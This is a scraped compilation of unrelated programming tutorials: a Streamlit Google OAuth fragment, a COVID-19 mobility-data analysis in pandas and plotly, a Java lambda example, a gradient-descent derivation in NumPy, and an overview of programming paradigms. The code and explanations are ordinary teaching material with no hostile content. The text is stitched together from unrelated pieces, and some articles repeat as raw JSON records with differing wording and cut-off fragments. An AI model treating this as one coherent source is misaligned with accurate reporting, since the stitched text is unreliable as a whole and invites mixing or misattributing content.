Store this in a session_state.py :" }, { "code": null, "e": 2435, "s": 2324, "text": "In the main application, we first define these three variables to store the Client ID and Secret from earlier:" }, { "code": null, "e": 2569, "s": 2435, "text": "client_id = os.environ['GOOGLE_CLIENT_ID']client_secret = os.environ['GOOGLE_CLIENT_SECRET']redirect_uri = os.environ['REDIRECT_URI']" }, { "code": null, "e": 2625, "s": 2569, "text": "We’ll be using httpx-oauth as our authorization client:" }, { "code": null, "e": 2673, "s": 2625, "text": "client = GoogleOAuth2(client_id, client_secret)" }, { "code": null, "e": 2741, "s": 2673, "text": "Now, create a function that handles creating the authorization URL:" }, { "code": null, "e": 3287, "s": 2741, "text": "async def write_authorization_url(client, redirect_uri): authorization_url = await client.get_authorization_url( redirect_uri, scope=[\"email\"], extras_params={\"access_type\": \"offline\"}, ) return authorization_urlauthorization_url = asyncio.run( write_authorization_url(client=client, redirect_uri=redirect_uri))st.write(f'''<h1> Please login using this <a target=\"_self\" href=\"{authorization_url}\">url</a></h1>''', unsafe_allow_html=True)" }, { "code": null, "e": 3459, "s": 3287, "text": "Once the user gets redirected back from Google Authorisation page, the authorization code is contained in the URL. We’ll obtain it using st.experimental_get_query_params()" }, { "code": null, "e": 3509, "s": 3459, "text": "code = st.experimental_get_query_params()['code']" }, { "code": null, "e": 3559, "s": 3509, "text": "And get the token from Google with this function:" }, { "code": null, "e": 3917, "s": 3559, "text": "async def write_access_token(client, redirect_uri, code): token = await client.get_access_token(code, redirect_uri) return tokentoken = asyncio.run( write_access_token(client=client, redirect_uri=redirect_uri, code=code))session_state.token = token" }, { "code": null, "e": 3959, "s": 3917, "text": "The process can be visualized as follows:" }, { "code": null, "e": 4183, "s": 3959, "text": "We store the token using the SessionState utility so that the user does not need to re-authorize during a session. Since we’re storing the token per session, refreshing the page will trigger the authorization process again." } ]
Can Google’s Mobility Report explain New Zealand’s win against the virus? | by Alejandra Vlerick | Towards Data Science
Europe has slowly started opening up after months of restless lockdown, which gives me hope that the worst is behind us. Working from home and virtual wine evenings with friends have become the new 'normal'. These measures have been put into motion to enforce physical distancing and ultimately slow down the spread of the deadly virus.

How effective have these policies been in reducing human movement? What impact have they had on the way people live, work and move?

Google introduced the COVID-19 Community Mobility Reports using anonymous data gathered from apps such as Google Maps. This dataset is regularly updated by Google itself and can be found here. The latest date available for the purpose of this analysis is May 24th.

Specific categories of destinations have been identified in this Google study, and the number of visitors to those destinations has been measured. The number of visits per day is then compared to a baseline day (selected to be an average day before the pandemic).

Grocery stores
Pharmacies
Time spent at home

A baseline day is a 'normal day' (not a holiday, sports event, Valentine's, St. Patrick's, etc). The baseline day provides a reliable objective value for a specific day of the week, meaning that we have a baseline value of people going to the grocery store on Monday, Tuesday, Wednesday, Thursday, Friday, Saturday and Sunday.

Creating baseline days is a clever way of differentiating weekends from weekdays, for example. I usually do my grocery shopping on weekends, not Tuesdays. I suspect I'm not alone in this.

In Spain, France or Belgium, supermarkets are not open on Sundays, so the baseline value will be lower than for countries where everything is always open.

The data is presented in percentage change, which can be positive (when mobility to a destination increased) or negative (when it decreased).

A choropleth map is a thematic map in which areas are shaded in proportion to a statistical variable that represents an aggregate summary of a geographic characteristic within each area.

Additionally, I chose to use a line graph to plot the mobility change in four countries that have been particularly affected by the virus: the United States, Brazil and the United Kingdom. I also added New Zealand because they recently eradicated their last case of coronavirus. Impressive!

Retail and recreation: How did the number of visitors to retailers and recreation centres change since the beginning of the pandemic?

Comparing the percentage change in mobility with the baseline value, a few observations can be made:

March 15th was the first day when more coronavirus cases were recorded outside of mainland China than inside. This triggered the change in mobility pattern for all the countries presented in this study.

The country with the most noticeable change in mobility compared to baseline values was New Zealand. They reduced their store visits by 90%! More than any other country.

It is important to notice that the United States has an increasing trend in the number of store visits starting from April 12 onwards.

After a drastic change in behaviour that reached a peak on March 29th, Americans have allowed themselves to visit more and more retail stores. In comparison, the United Kingdom saw a constant decrease in store visits that hit a minimum on March 29th, but its number of store visits has managed to stay constant throughout the isolation period.
The number of visits made to pharmacies compared to the baseline varies greatly by country. For the United States, the change in the number of visits transitioned from positive to negative on the 22nd of March. On this day, the number of coronavirus cases was 26,747, overtaking countries like Spain, Iran and Germany. This made the United States the third-most affected country in the world.

New Zealand is again at the top of the chart with the highest percentage change, meaning they made the fewest pharmacy visits.

Note: Unlike the previous two charts, the percentages here are positive and they indicate an increase in time spent at home (previously we were talking about a decrease in visits to stores or pharmacies).

A couple of observations can be made:

The United States was the first to enforce stay-at-home policies, but this translated into only 15-20% more time spent at home than on baseline days. During April and May, this percentage decreased to 5-15%. This is in line with the previous observations, as the number of store visits and pharmacy visits increased during this period.

It is surprising to note that the United States' behaviour is very similar to that in Brazil.

New Zealand was the last to impose stay-at-home policies, yet they had the biggest percentage change, reaching on average 35% more time spent at home. This value stayed constant until early May, when the government allowed more freedom of movement.

Many more insights can be drawn from the information provided by Google's Mobility Report. This article is just an initial appraisal. More updates will come soon; please comment below if you would like to see your country of origin or residence in the updates to come.

# Import libraries
import numpy as np
import pandas as pd
import plotly as py
import plotly.express as px
import plotly.graph_objs as go
from plotly.subplots import make_subplots
from tabulate import tabulate

# Read data
df = pd.read_csv("data/Global_Mobility_Report.csv", low_memory=False)

# Rename columns
df = df.rename(columns={'country_region': 'Country'})
df = df.rename(columns={'date': 'Date'})
df = df.rename(columns={'retail_and_recreation_percent_change_from_baseline': 'retail'})
df = df.rename(columns={'grocery_and_pharmacy_percent_change_from_baseline': 'pharmacy'})
df = df.rename(columns={'parks_percent_change_from_baseline': 'parks'})
df = df.rename(columns={'transit_stations_percent_change_from_baseline': 'transit_station'})
df = df.rename(columns={'workplaces_percent_change_from_baseline': 'workplaces'})
df = df.rename(columns={'residential_percent_change_from_baseline': 'residential'})
df.drop(['country_region_code', 'sub_region_1', 'sub_region_2'], axis=1, inplace=True)
print(tabulate(df[20000:20050], headers='keys', tablefmt='psql'))

# Manipulate the dataframe: one row per country with the latest date
df_countries = df.groupby(['Country', 'Date']).sum().reset_index().sort_values('Date', ascending=False)
df_countries = df_countries.drop_duplicates(subset=['Country'])

# Aggregate by date and country for the choropleth
df_countrydate = df.groupby(['Date', 'Country']).sum().reset_index()
min_cases = df_countrydate['residential'].min()

# Select the four countries for the line chart
df_country = df.groupby(['Country', 'Date']).sum().reset_index()
c2 = df_country[df_country['Country'] == "New Zealand"]
c3 = df_country[df_country['Country'] == "Brazil"]
c4 = df_country[df_country['Country'] == "United Kingdom"]
c5 = df_country[df_country['Country'] == "United States"]
frames = [c2, c3, c4, c5]
countries = pd.concat(frames)

# Line chart of pharmacy mobility for the four countries
fig = px.line(countries, x="Date", y="pharmacy", title='pharmacy', color='Country')
# fig.show()

# Animated choropleth of retail mobility
fig = px.choropleth(df_countrydate,
                    locations="Country",
                    locationmode="country names",
                    color="retail",
                    hover_name="Country",
                    animation_frame="Date",
                    # range_color=(0, 20000),
                    range_color=(-500, 500),
                    color_continuous_scale=px.colors.diverging.Picnic,
                    color_continuous_midpoint=min_cases,
                    )
fig.update_layout(
    title_text='Stay at home (quarantine) during coronavirus pandemic',
    title_x=0.5,
    geo=dict(
        showframe=False,
        showcoastlines=False,
    ))
# fig.show()

All the code can be found in the world_covid.py file on GitHub here!

If you like my work, I'd greatly appreciate it if you followed me on Medium here. If you have any questions, suggestions or ideas on how to improve, please leave a comment below or get in touch through LinkedIn here.
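As a side note on the metric itself: the "percent change from baseline" columns in the report are simply (observed - baseline) / baseline * 100, where the baseline is a per-weekday reference value from before the pandemic (the article describes it as an average day; Google documents it as a median over early 2020). A toy pandas sketch, with made-up numbers purely for illustration:

import pandas as pd

# illustrative visit counts for four consecutive Mondays
visits = pd.Series([120, 95, 60, 40],
                   index=pd.to_datetime(["2020-03-02", "2020-03-09",
                                         "2020-03-16", "2020-03-23"]))
monday_baseline = 100  # made-up pre-pandemic Monday reference value
pct_change = (visits - monday_baseline) / monday_baseline * 100
print(pct_change)  # 20.0, -5.0, -40.0, -60.0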
[ { "code": null, "e": 507, "s": 171, "text": "Europe has slowly started opening up after months of restless lockdown, this gives me hope that the worst is behind us. Working from home and virtual wine evenings with friends have become the new ‘normal’. These measures have been put into motion to enforce physical distancing and ultimately slow down the spread of the deadly virus." }, { "code": null, "e": 636, "s": 507, "text": "How effective have these policies been in reducing human movement? What impact has it had on the way people live, work and move?" }, { "code": null, "e": 901, "s": 636, "text": "Google introduced the COVID-19 Community Mobility Reports using anonymous data gathered from apps such as Google Maps. This dataset is regularly updated by Google itself and can be found here. The latest date available for the purpose of this analysis is May 24th." }, { "code": null, "e": 1166, "s": 901, "text": "Specific categories of destinations have been identified in this Google study and they have measured the number of visitors to those destinations. The number of visits per day are then compared to a baseline day (selected to be an average day before the pandemic)." }, { "code": null, "e": 1181, "s": 1166, "text": "Grocery stores" }, { "code": null, "e": 1192, "s": 1181, "text": "Pharmacies" }, { "code": null, "e": 1211, "s": 1192, "text": "Time spent at home" }, { "code": null, "e": 1530, "s": 1211, "text": "A baseline day is a ‘normal day’ (not a holiday, sports event, Valentine’s, St. Patrick’s, etc). The baseline day provides a reliable objective value for a specific day of the week. Meaning that we have a baseline value of people going to the groceries store on Monday, Tuesday, Wednesday, Friday, Saturday and Sunday." }, { "code": null, "e": 1716, "s": 1530, "text": "Creating baseline days is a clever way of differentiating weekend from weekdays for example. I usually do my grocery shopping on weekends, not Tuesdays. I suspect I’m not alone in this." }, { "code": null, "e": 1868, "s": 1716, "text": "In Spain, France or Belgium, supermarkets are not open on Sundays, the baseline value will be lower than for countries where everything is always open." }, { "code": null, "e": 2009, "s": 1868, "text": "The data is presented in percentage change, this can be positive (when mobility to a destination increased) or negative (when it decreased)." }, { "code": null, "e": 2196, "s": 2009, "text": "A choropleth map is a thematic map in which areas are shaded in proportion to a statistical variable that represents an aggregate summary of a geographic characteristic within each area." }, { "code": null, "e": 2483, "s": 2196, "text": "Additionally, I chose to use a line-graph to plot the mobility change in four countries that have been particularly affected by the virus: United States, Brazil and the United Kingdom. I also added New Zealand because they recently eradicated their last case of coronavirus. Impressive!" }, { "code": null, "e": 2617, "s": 2483, "text": "Retail and recreation: How did the number of visitors to retailers and recreation centres change since the beginning of the pandemic?" }, { "code": null, "e": 2725, "s": 2617, "text": "The graph below paints an image of the percentage change in mobility when compared with the baseline value." }, { "code": null, "e": 2757, "s": 2725, "text": "A few observations can be made:" }, { "code": null, "e": 2961, "s": 2757, "text": "March 15th was the first day where more coronavirus cases were recorded outside of mainland China than inside. 
This triggered the change in mobility pattern for all the countries presented in this study." }, { "code": null, "e": 3131, "s": 2961, "text": "The country with the most noticeable change in mobility compared to baseline values was New Zealand. They reduced their store visits by 90%! More than any other country." }, { "code": null, "e": 3269, "s": 3131, "text": "It is important to notice that the United States as an increasing trend in the number of store visits that started from April 12 onwards." }, { "code": null, "e": 3615, "s": 3269, "text": "After a drastic change in behaviour that reached a peak on March 29th, American’s have allowed themselves to visit more and more retail stores. In comparison, the United Kingdom saw a constant decrease in store visits that hit a minimum on March 29th, but this number of store visits has managed to stay constant throughout the isolation period." }, { "code": null, "e": 4031, "s": 3615, "text": "The number of visits made to pharmacies compared to the baseline varies greatly by country, as can be seen from the graph below. For the United States, the change in number of visits transitioned from positive to negative on the 22nd of March. On this day, the number of coronavirus cases was 26,747, overtaking countries like Spain, Iran and Germany. This made them the third-highest affected country in the world." }, { "code": null, "e": 4157, "s": 4031, "text": "New Zealand is again at the top of the chart with the highest percentage change, meaning they made the least pharmacy visits." }, { "code": null, "e": 4361, "s": 4157, "text": "Note: Unlike the previous two charts, the percentages here are positive and they indicate in increase in time spent at home (previously we were talking about a decrease in visits to stores or pharmacy) ." }, { "code": null, "e": 4399, "s": 4361, "text": "A couple of observations can be made:" }, { "code": null, "e": 4736, "s": 4399, "text": "The United States was the first to enforce stay at home policies, but this translated into only 15 -20% more time spent at home than on baseline days. During April and May, this percentage decreased to 5 -15%. This is in line with the previous observations as the number of store visits and pharmacy visits increased during this period." }, { "code": null, "e": 4829, "s": 4736, "text": "It is surprising to note that the United States behaviour is very similar to that in Brazil." }, { "code": null, "e": 5076, "s": 4829, "text": "New-Zealand was the last to impose stay at home policies, yet they had the biggest percentage change reaching on average 35% more time spent at home. This value stayed constant until early May when the government allowed more freedom of movement." }, { "code": null, "e": 5345, "s": 5076, "text": "Many more insights can be drawn from the information provided by Google’s Mobility report. This article is just an initial appraisal. More updates will come soon, please comment below of you would like to see your country of origin or residence in the updates to come." 
}, { "code": null, "e": 7850, "s": 5345, "text": "# Import librariesimport numpy as npimport pandas as pdimport plotly as pyimport plotly.express as pximport plotly.graph_objs as gofrom plotly.subplots import make_subplotsfrom tabulate import tabulate# Read Datadf = pd.read_csv(\"data/Global_Mobility_Report.csv\", low_memory=False)# Rename columnsdf = df.rename(columns={'country_region':'Country'})df = df.rename(columns={'date':'Date'})df = df.rename(columns={'retail_and_recreation_percent_change_from_baseline':'retail'})df = df.rename(columns={'grocery_and_pharmacy_percent_change_from_baseline':'pharmacy'})df = df.rename(columns={'parks_percent_change_from_baseline':'parks'})df = df.rename(columns={'transit_stations_percent_change_from_baseline':'transit_station'})df = df.rename(columns={'workplaces_percent_change_from_baseline':'workplaces'})df = df.rename(columns={'residential_percent_change_from_baseline':'residential'})df.drop(['country_region_code','sub_region_1', 'sub_region_2'], axis=1, inplace = True)print(tabulate(df[20000:20050], headers='keys', tablefmt='psql'))# Manipulate Dataframedf_countries = df.groupby(['Country', 'Date']).sum().reset_index().sort_values('Date', ascending=False)df_countries = df_countries.drop_duplicates(subset = ['Country'])# Manipulating the original dataframedf_countrydate = dfdf_countrydate = df_countrydate.groupby(['Date','Country']).sum().reset_index()min_cases = df_countrydate['residential'].min()df_country = df.groupby(['Country','Date']).sum().reset_index()c2 = df_country[df_country['Country']==\"New Zealand\"]c3 = df_country[df_country['Country']==\"Brazil\"]c4 = df_country[df_country['Country']==\"United Kingdom\"]c5 = df_country[df_country['Country']==\"United States\"]frames = [c2, c3, c4, c5]countries = pd.concat(frames)fig = px.line(countries, x=\"Date\", y=\"pharmacy\", title='pharmacy', color = 'Country')# fig.show()fig = px.choropleth(df_countrydate, locations=\"Country\", locationmode=\"country names\", color=\"retail\", hover_name=\"Country\", animation_frame=\"Date\", # range_color=(0, 20000), range_color=(-500, 500), color_continuous_scale=px.colors.diverging.Picnic, color_continuous_midpoint=min_cases, )fig.update_layout( title_text='Stay at home (quarantine) during coronavirus pandemic', title_x=0.5, geo=dict( showframe=False, showcoastlines=False, ))# fig.show()" }, { "code": null, "e": 7919, "s": 7850, "text": "All the code can be found in the world_covid.py file on Github here!" }, { "code": null, "e": 7995, "s": 7919, "text": "If you like my work, I’d greatly appreciate if you followed me Medium here." } ]
Why we use lambda expressions in Java?
A lambda expression can implement a functional interface by defining an anonymous function that can be passed as an argument to some method.

Enables functional programming: All new JVM-based languages take advantage of the functional paradigm in their applications, but programmers were forced to work with object-oriented programming (OOP) until lambda expressions came along. Lambda expressions therefore enable us to write functional code in Java.

Readable and concise code: People who have started using lambda expressions report that they can help remove a huge number of lines from their code.

Easy-to-use APIs and libraries: An API designed using lambda expressions can be easier to use and easier to compose with other APIs.

Enables support for parallel processing: Lambda expressions also make it easier to write parallel code, which matters because nearly every modern processor is multi-core.

(arg1, arg2...) -> { body }
 or
(type1 arg1, type2 arg2...) -> { body }

@FunctionalInterface
interface Action {
   void run(String s);
}
public class LambdaExpressionTest {
   public void action(Action action) {
      action.run("Welcome to TutorialsPoint");
   }
   public static void main(String[] args) {
      new LambdaExpressionTest().action((String s) -> System.out.print("*" + s + "*")); // lambda expression
   }
}

*Welcome to TutorialsPoint*
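The pattern is not Java-specific. For comparison, here is the same idea sketched in Python (an illustrative sketch written for this article, not part of the original example): a function accepts behaviour as an argument, and a lambda supplies that behaviour inline.

# action() accepts behaviour as an argument;
# the lambda supplies the implementation inline
def action(run):
    run("Welcome to TutorialsPoint")

action(lambda s: print("*" + s + "*"))  # prints *Welcome to TutorialsPoint*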
[ { "code": null, "e": 1203, "s": 1062, "text": "A lambda expression can implement a functional interface by defining an anonymous function that can be passed as an argument to some method." }, { "code": null, "e": 1490, "s": 1203, "text": "Enables functional programming: All new JVM based languages take advantage of the functional paradigm in their applications, but programmers forced to work with Object-Oriented Programming (OOPS) till lambda expressions came. Hence lambda expressions enable us to write functional code." }, { "code": null, "e": 1642, "s": 1490, "text": "Readable and concise code: People have started using lambda expressions and reported that it can help to remove a huge number of lines from their code." }, { "code": null, "e": 1759, "s": 1642, "text": "Easy-to-Use APIs and Libraries: An API designed using lambda expressions can be easier to use and support other API." }, { "code": null, "e": 1928, "s": 1759, "text": "Enables support for parallel processing: A lambda expression can also enable us to write parallel processing because every processor is a multi-core processor nowadays." }, { "code": null, "e": 2000, "s": 1928, "text": "(arg1, arg2...) -> { body }\n or\n(type1 arg1, type2 arg2...) -> { body }" }, { "code": null, "e": 2375, "s": 2000, "text": "import javax.swing.*;\n\n@FunctionalInterface\ninterface Action {\n void run(String s);\n}\npublic class LambdaExpressionTest {\n public void action(Action action) {\n action.run(\"Welcome to TutorialsPoint\");\n }\n public static void main(String[] args) {\n new LambdaExpressionTest().action((String s) -> System.out.print(\"*\" + s + \"*\")); // lambda expression\n }\n}" }, { "code": null, "e": 2403, "s": 2375, "text": "*Welcome to TutorialsPoint*" } ]
A Step-by-Step Implementation of Gradient Descent and Backpropagation | by Yitong Ren | Towards Data Science
The original intention behind this post was merely me brushing up on the mathematics of neural networks, as I like to be well versed in the inner workings of algorithms and get to the essence of things. I then thought I might as well put together a story rather than just revisiting the formulas on my notepad over and over. Though you might find a number of tutorials for building a simple neural network from scratch, different people have varied angles of seeing things as well as different emphases of study. Another way of thinking might in some sense enhance understanding. So let's dive in.

Neural network in a nutshell

The core of a neural network is a big function that maps some input to the desired target value; the intermediate steps multiply by weights and add biases in a pipeline, over and over again. The process of training a neural network is to determine a set of parameters that minimize the difference between expected value and model output. This is done using gradient descent (aka backpropagation), which by definition comprises two steps: calculating gradients of the loss/error function, then updating existing parameters in response to the gradients, which is how the descent is done. This cycle is repeated until reaching the minima of the loss function. The learning process can be described by the simple equation W(t+1) = W(t) - dJ(W)/dW(t) (with the learning rate implicitly set to 1 here).

The mathematical intuition

For my own practice purposes, I like to use a small network with a single hidden layer as in the diagram. In this layout, X represents the input; subscripts i, j, k index the units in the input, hidden and output layers respectively; w_ij represents the weights connecting the input to the hidden layer, and w_jk is the weights connecting the hidden to the output layer.

The model output calculation, in this case, would be:

yhat = sigmoid( sigmoid(X * w_ij) * w_jk )

Often the choice of loss function is the sum of squared errors. Here I use the sigmoid activation function and assume the bias b is 0 for simplicity, meaning weights are the only variables that affect model output. Let's derive the formula for the gradients of the hidden-to-output weights w_jk. Applying the chain rule to J = 0.5 * sum((y - yhat)^2) gives (consistent with the code below):

dJ/dw_jk = -(y - yhat) * sigmoid'(z_k) * x_j

where x_j is the hidden-layer activation. The complexity of determining the input-to-hidden weights is that they affect the output error indirectly. Each hidden unit's output affects the model output, so the input-to-hidden weights w_ij depend on the errors at all of the units they are connected to. The derivation starts the same way, just expanding the chain rule at z_k into the subfunction:

dJ/dw_ij = -[(y - yhat) * sigmoid'(z_k) * w_jk] * sigmoid'(z_j) * x_i

More thoughts:

Notice that the gradients of the two weights have a similar form. The error is backpropagated via the derivative of the activation function, then weighted by the input (the activation output) from the previous layer. In the second formula, the backpropagated error from the output layer is further projected onto w_jk, then the same backpropagation is repeated and weighted by the input. This backpropagating process is iterated all the way back to the very first layer in an arbitrary-layer neural network.
"The gradients with respect to each parameter are thus considered to be the contribution of the parameter to the error and should be negated during learning."

Putting the above process into code, below is the complete example:

import numpy as np

class NeuralNetwork:
    def __init__(self):
        np.random.seed(10)  # for generating the same results
        self.wij = np.random.rand(3, 4)  # input to hidden layer weights
        self.wjk = np.random.rand(4, 1)  # hidden layer to output weights

    def sigmoid(self, x, w):
        z = np.dot(x, w)
        return 1 / (1 + np.exp(-z))

    def sigmoid_derivative(self, x, w):
        return self.sigmoid(x, w) * (1 - self.sigmoid(x, w))

    def gradient_descent(self, x, y, iterations):
        for i in range(iterations):
            Xi = x
            Xj = self.sigmoid(Xi, self.wij)
            yhat = self.sigmoid(Xj, self.wjk)
            # gradients for hidden to output weights
            g_wjk = np.dot(Xj.T, (y - yhat) * self.sigmoid_derivative(Xj, self.wjk))
            # gradients for input to hidden weights
            g_wij = np.dot(Xi.T, np.dot((y - yhat) * self.sigmoid_derivative(Xj, self.wjk), self.wjk.T) * self.sigmoid_derivative(Xi, self.wij))
            # update weights (g is the negated gradient, so adding it descends the loss)
            self.wij += g_wij
            self.wjk += g_wjk
        print('The final predictions from the neural network are: ')
        print(yhat)

if __name__ == '__main__':
    neural_network = NeuralNetwork()
    print('Random starting input to hidden weights: ')
    print(neural_network.wij)
    print('Random starting hidden to output weights: ')
    print(neural_network.wjk)
    X = np.array([[0, 0, 1], [1, 1, 1], [1, 0, 1], [0, 1, 1]])
    y = np.array([[0, 1, 1, 0]]).T
    neural_network.gradient_descent(X, y, 10000)
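One way to convince yourself that the derived gradients are right is a finite-difference check. The sketch below was written for this article and assumes the squared-error loss J = 0.5 * sum((y - yhat)^2) used in the derivation; it compares the analytic gradient of J with respect to w_jk against a numerical estimate, and the two agree to roughly 1e-9. Note the sign: the network code above adds the negated gradient, which is why += performs descent.

import numpy as np

np.random.seed(10)
X = np.array([[0, 0, 1], [1, 1, 1], [1, 0, 1], [0, 1, 1]], dtype=float)
y = np.array([[0, 1, 1, 0]], dtype=float).T
wij = np.random.rand(3, 4)
wjk = np.random.rand(4, 1)

def sigmoid(z):
    return 1 / (1 + np.exp(-z))

def loss():
    # squared-error loss of the two-layer network
    return 0.5 * np.sum((y - sigmoid(sigmoid(X @ wij) @ wjk)) ** 2)

# analytic gradient dJ/dw_jk from the derivation above
Xj = sigmoid(X @ wij)
yhat = sigmoid(Xj @ wjk)
analytic = -Xj.T @ ((y - yhat) * yhat * (1 - yhat))

# central finite-difference estimate of the same gradient
numeric = np.zeros_like(wjk)
eps = 1e-6
for idx in np.ndindex(wjk.shape):
    wjk[idx] += eps
    hi = loss()
    wjk[idx] -= 2 * eps
    lo = loss()
    wjk[idx] += eps
    numeric[idx] = (hi - lo) / (2 * eps)

print(np.max(np.abs(analytic - numeric)))  # ~1e-10: the gradients agree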
[ { "code": null, "e": 756, "s": 172, "text": "The original intention behind this post was merely me brushing upon mathematics in neural network, as I like to be well versed in the inner workings of algorithms and get to the essence of things. I then think I might as well put together a story rather than just revisiting the formulas on my notepad over and over. Though you might find a number of tutorials for building a simple neural network from scratch. Different people have varied angles of seeing things as well as the emphasis of study. Another way of thinking might in some sense enhance understanding. So let’s dive in." }, { "code": null, "e": 785, "s": 756, "text": "Neural network in a nutshell" }, { "code": null, "e": 1610, "s": 785, "text": "The core of neural network is a big function that maps some input to the desired target value, in the intermediate step does the operation to produce the network, which is by multiplying weights and add bias in a pipeline scenario that does this over and over again. The process of training a neural network is to determine a set of parameters that minimize the difference between expected value and model output. This is done using gradient descent (aka backpropagation), which by definition comprises two steps: calculating gradients of the loss/error function, then updating existing parameters in response to the gradients, which is how the descent is done. This cycle is repeated until reaching the minima of the loss function. This learning process can be described by the simple equation: W(t+1) = W(t) — dJ(W)/dW(t)." }, { "code": null, "e": 1637, "s": 1610, "text": "The mathematical intuition" }, { "code": null, "e": 1998, "s": 1637, "text": "For my own practice purpose, I like to use a small network with a single hidden layer as in the diagram. In this layout, X represents input, subscripts i, j, k denote the number of units in the input, hidden and output layers respectively; w_ij represents the weights connecting input to hidden layer, and w_jk is the weights connecting hidden to output layer." }, { "code": null, "e": 2052, "s": 1998, "text": "The model output calculation, in this case, would be:" }, { "code": null, "e": 2347, "s": 2052, "text": "Often the choice of the loss function is the sum of squared error. Here I use sigmoid activation function and assume bias b is 0 for simplicity, meaning weights are the only variables that affect model output. Let’s derive the formula for calculating gradients of hidden to output weights w_jk." }, { "code": null, "e": 2675, "s": 2347, "text": "The complexity of determining input to hidden weights is that it affects output error indirectly. Each hidden unit output affects model output, thus input to hidden weights w_ij depend on the errors at all of the units it is connected to. The derivation starts the same, just to expand the chain rule at z_k to the subfunction." }, { "code": null, "e": 2690, "s": 2675, "text": "More thoughts:" }, { "code": null, "e": 3355, "s": 2690, "text": "Notice that the gradients of the two weights have a similar form. The error is backpropagated via the derivative of activation function, then weighted by the input (the activation output) from the previous layer. In the second formula, the backpropagated error from the output layer is further projected onto w_jk, then repeat the same way of backpropagation and weighted by the input. This backpropagating process is iterated all the way back to the very first layer in an arbitrary-layer neural network. 
“The gradients with respect to each parameter are thus considered to be the contribution of the parameter to the error and should be negated during learning.”" }, { "code": null, "e": 3392, "s": 3355, "text": "Putting the above process into code:" }, { "code": null, "e": 3423, "s": 3392, "text": "Below is the complete example:" } ]
Introduction of Programming Paradigms - GeeksforGeeks
25 Apr, 2022

A paradigm can be termed a method to solve some problem or do some task. A programming paradigm is an approach to solving a problem using some programming language; we can also say it is a method to solve a problem using the tools and techniques available to us, following some approach. There are lots of programming languages that are known, but all of them need to follow some strategy when they are implemented, and this methodology/strategy is a paradigm. Apart from the variety of programming languages, there are lots of paradigms to fulfil each and every demand. They are discussed below:

1. Imperative programming paradigm: It is one of the oldest programming paradigms. It features a close relation to machine architecture and is based on the Von Neumann architecture. It works by changing the program state through assignment statements. It performs the task step by step by changing state. The main focus is on how to achieve the goal. The paradigm consists of several statements, and after execution of all of them, the result is stored.

Advantages:

Very simple to implement
It contains loops, variables, etc.

Disadvantages:

Complex problems cannot be solved
Less efficient and less productive
Parallel programming is not possible

Examples of the imperative programming paradigm:

C : developed by Dennis Ritchie and Ken Thompson
Fortran : developed by John Backus for IBM
Basic : developed by John G Kemeny and Thomas E Kurtz

C

// average of five numbers in C
int marks[5] = { 12, 32, 45, 13, 19 };
int sum = 0;
float average = 0.0;
for (int i = 0; i < 5; i++) {
    sum = sum + marks[i];
}
average = sum / 5.0;

Imperative programming is divided into three broad categories: procedural, OOP and parallel processing. These paradigms are as follows:

Procedural programming paradigm – This paradigm emphasizes procedure in terms of the underlying machine model. There is no difference between the procedural and imperative approaches. It has the ability to reuse code, and this reusability was a boon at the time it was in widespread use.

Examples of the procedural programming paradigm:

C : developed by Dennis Ritchie and Ken Thompson
C++ : developed by Bjarne Stroustrup
Java : developed by James Gosling at Sun Microsystems
ColdFusion : developed by J J Allaire
Pascal : developed by Niklaus Wirth

C++

#include <iostream>
using namespace std;
int main()
{
    int i, fact = 1, num;
    cout << "Enter any Number: ";
    cin >> num;
    for (i = 1; i <= num; i++) {
        fact = fact * i;
    }
    cout << "Factorial of " << num << " is: " << fact << endl;
    return 0;
}

Then comes OOP:

Object-oriented programming – The program is written as a collection of classes and objects which are meant for communication. The smallest and most basic entity is the object, and all kinds of computation are performed on the objects only. More emphasis is on data rather than procedure. It can handle almost all kinds of real-life problems encountered today.

Advantages:

Data security
Inheritance
Code reusability
Flexibility and abstraction

Examples of the object-oriented programming paradigm:

Simula : first OOP language
Java : developed by James Gosling at Sun Microsystems
C++ : developed by Bjarne Stroustrup
Objective-C : designed by Brad Cox
Visual Basic .NET : developed by Microsoft
Python : developed by Guido van Rossum
Ruby : developed by Yukihiro Matsumoto
Smalltalk : developed by Alan Kay, Dan Ingalls, Adele Goldberg

Java

import java.io.*;

class GFG {
    public static void main(String[] args)
    {
        System.out.println("GfG!");
        Signup s1 = new Signup();
        s1.create(22, "riya", "[email protected]", 'F', 89002);
    }
}

class Signup {
    int userid;
    String name;
    String emailid;
    char sex;
    long mob;

    public void create(int userid, String name, String emailid, char sex, long mob)
    {
        System.out.println("Welcome to GeeksforGeeks\nLets create your account\n");
        // store the supplied details on this object
        this.userid = userid;
        this.name = name;
        this.emailid = emailid;
        this.sex = sex;
        this.mob = mob;
        System.out.println("your account has been created");
    }
}

Parallel processing approach – Parallel processing is the processing of program instructions by dividing them among multiple processors. A parallel processing system possesses many processors with the objective of running a program in less time by dividing the work among them. This approach is much like divide and conquer. Examples are NESL (one of the oldest) and C/C++, which also supports it through some library functions.
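To make the divide-and-conquer idea concrete, here is a minimal sketch of the parallel-processing approach using Python's standard-library multiprocessing module (the four-way split is arbitrary and purely illustrative):

from multiprocessing import Pool

def partial_sum(chunk):
    # each worker computes its share of the total
    return sum(x * x for x in chunk)

if __name__ == "__main__":
    data = list(range(1_000_000))
    chunks = [data[i::4] for i in range(4)]         # divide the work four ways
    with Pool(processes=4) as pool:
        total = sum(pool.map(partial_sum, chunks))  # conquer in parallel
    print(total)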
2. Declarative programming paradigm: It is divided into logic, functional and database paradigms. In computer science, declarative programming is a style of building programs that expresses the logic of a computation without talking about its control flow. It often considers programs as theories of some logic. It may simplify writing parallel programs. The focus is on what needs to be done rather than how it should be done; the emphasis is on what the code is actually doing. It just declares the result we want rather than how it has to be produced. This is the only difference between the imperative (how to do) and declarative (what to do) programming paradigms. Going deeper, we will look at logic, functional and database paradigms.

Logic programming paradigm – It can be termed an abstract model of computation. It can solve logical problems like puzzles, series, etc. In logic programming we have a knowledge base which we know in advance, and this knowledge base, along with the question, is given to the machine, which produces a result. In normal programming languages, such a concept of a knowledge base is not available, but in artificial intelligence and machine learning we have models, like the perceptron model, that use a similar mechanism. In logic programming the main emphasis is on the knowledge base and the problem. The execution of the program is very much like the proof of a mathematical statement, e.g., Prolog.

Sum of the first N natural numbers in Prolog:

sum(0, 0).
sum(N, R) :-
    N > 0,
    N1 is N - 1,
    sum(N1, R1),
    R is R1 + N.

